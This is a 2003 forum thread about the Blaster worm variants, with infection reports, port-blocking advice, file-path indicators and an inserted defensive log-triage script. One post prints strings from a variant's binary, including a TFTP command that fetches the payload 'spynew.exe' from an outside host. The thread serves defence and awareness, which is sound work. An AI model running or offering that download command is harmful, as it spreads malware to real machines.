Old 08-13-2003, 11:08 PM   #1
dj pussy
Confirmed User
 
Join Date: Jul 2003
Location: google
Posts: 1,440
Blaster worm - new versions

original worm:
http://www.symantec.com/avcenter/ven...ster.worm.html


new version b:
http://www.symantec.com/avcenter/ven...er.b.worm.html

new version c:
http://www.symantec.com/avcenter/ven...er.c.worm.html
Old 08-14-2003, 05:39 AM   #2
ONS
Registered User
 
Join Date: Jan 2001
Location: Sparta
Posts: 204
I got hit 40 mins ago. Simply renamed the 2 exe files to txt so it would not be able to restart and I ran the XP system restore, all fixed.
Old 08-14-2003, 05:40 AM   #3
IMP^or^SNiTL.e
A/S/L .. I don't names.
 
Industry Role:
Join Date: Aug 2003
Posts: 1,177
How do you get hit though, where does it most commonly go? MSN... ICQ... Kazaa?
Old 08-14-2003, 05:53 AM   #4
ONS
Registered User
 
Join Date: Jan 2001
Location: Sparta
Posts: 204
You can block with router or firewall.

TCP Port 135, "DCOM RPC"
UDP Port 69, "TFTP"

It's using a hole in Windows to get direct access; they just run up the IP chain from various sources infecting users at random. Soon as it got me my router lit up like a Christmas tree and I noticed 2 new exe files on my c:\ drive. If you just disconnect network from taskbar you kill the connection and then you can restore your system with no problems.

I even saved copies of the install for my collection.
Old 08-14-2003, 05:55 AM   #5
jeroman
So Fucking Banned
 
Join Date: Oct 2002
Location: Norway or UK or...damn, where am I
Posts: 356
Quote:
Originally posted by IMP^or^SNiTL.e
How do you get hit though, where does it most commonly go? MSN... ICQ... Kazaa?
It's spreading in the network and looks for IPs close to the IP it's on and goes to those IPs' machines and then it continues.

Nothing to do with ICQ, mail or whatever - that's the cool thing
Old 08-14-2003, 06:38 AM   #6
AdultNex
Confirmed User
 
Join Date: Feb 2003
Location: Bostonnnn
Posts: 8,985
Quote:
Originally posted by jeroman


It's spreading in the network and looks for IPs close to the IP it's on and goes to those IPs' machines and then it continues.

Nothing to do with ICQ, mail or whatever - that's the cool thing
In Layman's terms, it can travel through a normal connection. Meaning, while surfing around some websites, you could be hit without knowing it.
Old 08-14-2003, 08:01 AM   #7
ONS
Registered User
 
Join Date: Jan 2001
Location: Sparta
Posts: 204
Nah, you will know when it gets you because it starts sending packets to Microsoft to try and overload their servers. I did not get anything with the name Msblast.exe or by any of the names from the other 2 versions so this is something different. It cannot be removed by simply killing the process so the Symantec removal instructions might not be of much use.

Also if you reboot while infected it's not going to let you on the net and will shut you off every few mins. So if you do get hit then you better fix your system or restore before you reboot or you will regret it when your connection is overloaded. It's got a calling card inside that's needed to hijack to your system and appears to only affect English Windows versions.

You should block ports 130-140 from inbound connections just to be on the safe side unless you run services on any of those ports.

If you are infected you might find some of these files below on your machine. You will also find ctrl-alt-del (task manager) will close every time you open it to prevent you from killing the process.

c:\Documents and Settings\All Users\Start Menu\Programs\Startup\spynew.exe
c:\rootdir.exe
c:\wincgi32.exe


dink dink
%s Exploitable!
%s 135 open
start spynew.exe
tftp -i rpc.afraid.org GET spynew.exe
cd "\Documents and Settings\All Users\Start Menu\Programs\Startup\"

It looks for the following OS below and possibly won't affect non-English builds.

Windows XP SP1 (english)
Windows XP SP0 (english)
Windows 2000 SP4 (english)
Windows 2000 SP3 (english)
Windows 2000 SP2 (english)
Windows 2000 SP1 (english)
Windows 2000 SP0 (english)
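Added example (not part of any post in this thread): a log triage sketch built on the two ports named above and the `tftp ... GET` string quoted in post #7. It flags LAN hosts that accepted an inbound TCP/135 connection and then made an outbound UDP/69 request shortly afterwards. The log format, the `192.168.1.0/24` LAN range, the 5-minute window and the sample lines are all assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumed (hypothetical) firewall log format, one connection per line:
#   <ISO time> <ALLOW|DENY> <TCP|UDP> <src ip>:<port> -> <dst ip>:<port>
LINE_RE = re.compile(
    r"(\S+) (ALLOW|DENY) (TCP|UDP) ([\d.]+):(\d+) -> ([\d.]+):(\d+)$")
LAN = ip_network("192.168.1.0/24")  # assumed internal range

# Constructed sample log, not captured traffic.
SAMPLE_LOG = """\
2003-08-14T05:00:01 DENY TCP 203.0.113.7:4021 -> 192.168.1.10:135
2003-08-14T05:00:02 ALLOW TCP 203.0.113.7:4022 -> 192.168.1.20:135
2003-08-14T05:00:09 ALLOW UDP 192.168.1.20:1044 -> 198.51.100.5:69
2003-08-14T05:01:00 ALLOW TCP 192.168.1.30:1050 -> 198.51.100.9:80
2003-08-14T06:30:00 ALLOW UDP 192.168.1.40:1061 -> 198.51.100.5:69
""".splitlines()

def triage(lines, window=timedelta(minutes=5)):
    """Return (blocked_probes, suspects) from chronologically ordered lines.

    blocked_probes: LAN hosts that had inbound TCP/135 denied.
    suspects: LAN hosts that accepted inbound TCP/135 and then sent
    outbound UDP/69 (TFTP) within `window`.
    """
    exposed = {}            # LAN host -> time of last allowed inbound TCP/135
    blocked, suspects = set(), set()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue        # skip lines in an unknown format
        ts, action, proto, src, _sport, dst, dport = m.groups()
        when = datetime.fromisoformat(ts)
        src_in, dst_in = ip_address(src) in LAN, ip_address(dst) in LAN
        if proto == "TCP" and dport == "135" and dst_in and not src_in:
            if action == "ALLOW":
                exposed[dst] = when
            else:
                blocked.add(dst)
        elif proto == "UDP" and dport == "69" and src_in and not dst_in:
            seen = exposed.get(src)
            if action == "ALLOW" and seen and when - seen <= window:
                suspects.add(src)
    return sorted(blocked), sorted(suspects)

if __name__ == "__main__":
    blocked, suspects = triage(SAMPLE_LOG)
    print("probes blocked for:", blocked)
    print("isolate and inspect:", suspects)
```

A host in the second list is a candidate for the startup-folder and `c:\` file checks listed in post #7; a lone outbound TFTP request with no preceding TCP/135 hit is deliberately not flagged.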
Old 08-14-2003, 08:47 AM   #8
raceman
Confirmed User
 
Join Date: Jul 2003
Location: Now offshore on an island paying a heluva lot less tax than you suckers
Posts: 1,064
I was getting bombarded with hackers, it's my belief that my IP was displayed on a hacking site somewhere. It was getting so annoying that in the end I looked at all the files on the PC with a recent date stamp and deleted them "tee hee hee". After that I reinstalled Norton and ramped it up to full security, since then the fuckers have been knocked back. As soon as my current ADSL contract is up I'm going "dynamic".